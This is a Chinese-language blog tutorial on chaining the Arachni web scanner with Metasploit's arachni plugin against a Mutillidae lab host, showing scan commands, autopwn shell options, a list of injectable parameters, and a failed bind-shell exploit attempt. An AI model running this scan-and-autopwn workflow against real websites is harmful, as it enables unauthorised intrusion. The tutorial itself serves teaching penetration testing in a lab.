<a href="http://www.milsec.net/metasploit%E5%BA%94%E7%94%A8/41.html">http://www.milsec.net/metasploit%e5%ba%94%e7%94%a8/41.html</a>
arachni作為一款開源的掃描軟體,在判斷web腳本漏洞上的效率和精确度還是讓人稱贊的,arachni作為一款主流的開源掃描軟體,當然要跟随趨勢,可以很好的和metasploit配合使用,通過msf plugin,與metasploit達到無縫對接。
今天我們示範arachni與metasploit配合對網站進行掃描檢測和入侵。我的測試環境為
metasploitable+backbox+arachni+metasploit
首先我們通過arachni來對目标機進行掃描,看圖說話,不多累贅:
<a href="http://www.milsec.net/wp-content/uploads/2013/09/arachni.jpg"></a>
<code>root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory Arachni - Web Application Security Scanner Framework v0.4.2 Author: Tasos "Zapotek" Laskos</code>
(With the support of the community and the Arachni Team.)
Website: http://arachni-scanner.com
Documentation: http://arachni-scanner.com/wiki
[~] No modules were specified.
[~] -> Will run all mods. [~] No audit options were specified.
[~] -> Will audit links, forms and cookies.
通過掃描,儲存掃描日志為msf格式,以便于metasploit調用。
為了引入arachni的plugin到metasploit,我們需找到arachni的目錄,複制external/metasploit到metasploit的根目錄下面
cp -R arachni/external/metasploit/* metasploit/
然後運作metasploit,加載arachni插件,運作如下圖
<a href="http://www.milsec.net/wp-content/uploads/2013/09/metasploit.jpg"></a>
<code>root@metasploit:~# msfconsole</code>
[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops
msf > load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf > arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.
Unique exploits
===============
ID Exploit Description
-- ------- -----------
1 auxiliary/arachni_sqlmap
我們看下arachni的自動攻擊參數
<code>msf > arachni_autopwn [*] Usage: arachni_autopwn [options] -h Display this help text -x [regexp] Only run modules whose name matches the regex -a Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port (default) -m Use a meterpreter shell (if possible) -q Disable exploit module output</code>
我們選擇加載所有的溢出來進行比對
<a href="http://www.milsec.net/wp-content/uploads/2013/09/arachniauto.jpg"></a>
<code>msf > arachni_autopwn -a [*] Running pwn-jobs...</code>
[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
很不幸,木有一個成功的…………
接下來我們要看下arachni到底掃描出來了哪些漏洞,執行如下指令:
<a href="http://www.milsec.net/wp-content/uploads/2013/09/arachni_vulns.jpg"></a>
<code>msf > arachni_list_vulns</code>
Vulnerabilities
ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
2 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
3 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"} auxiliary/arachni_sqlmap
4 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
7 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
8 192.168.1.35 /mutillidae/index.php SQL Injection POST {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"} auxiliary/arachni_sqlmap
9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
10 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
11 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"} auxiliary/arachni_sqlmap
12 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"} auxiliary/arachni_sqlmap
13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap
14 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"} auxiliary/arachni_sqlmap
15 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"} unix/webapp/arachni_path_traversal
21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
讓俺這個土鼈手工溢出一下第17個漏洞
<a href="http://www.milsec.net/wp-content/uploads/2013/09/marachni.jpg"></a>
<code>msf> arachni_manual 17 [*] Using unix/webapp/arachni_exec . [*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ... SRVHOST => 127.0.0.1 SRVPORT => 10401 RHOST => 192.168.1.35 RPORT => 80 LHOST => 127.0.0.1 LPORT => 5376 SSL => false POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS METHOD => POST COOKIES => HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c PATH => /mutillidae/index.php [*] Done! PAYLOAD => cmd/unix/bind_perl msf exploit(arachni_exec) ></code>
看下配置有沒有問題,木有問題就開始執行,
<a href="http://www.milsec.net/wp-content/uploads/2013/09/options.jpg"></a>
<code>msf exploit(arachni_exec) > show options</code>
Module options (exploit/unix/webapp/arachni_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX
will be substituted with the payload.)
PATH /mutillidae/index.php yes The path to the vulnerable script.
POST target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies no Use a proxy chain
RHOST 192.168.1.35 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host
Payload options (cmd/unix/bind_perl):
LPORT 5376 yes The listen port
RHOST 192.168.1.35 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
看來是應該沒問題了,手動執行一下,看看最近攢的人品攢夠了沒
-_-!!!人品不好,兩次都沒成功
<code>msf exploit(arachni_exec) > exploit</code>
msf exploit(arachni_exec) > exploit
msf exploit(arachni_exec) >
今天的這個測試環境很不給面子啊,一個都沒成功,不過這裡隻是給大家展示,如何利用arachni和metasploit對一個web進行檢測和入侵的過程,簡單的吹水,高手請自動忽略,有問題請留言!!
![SQL優化SQL語句優化的目的[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)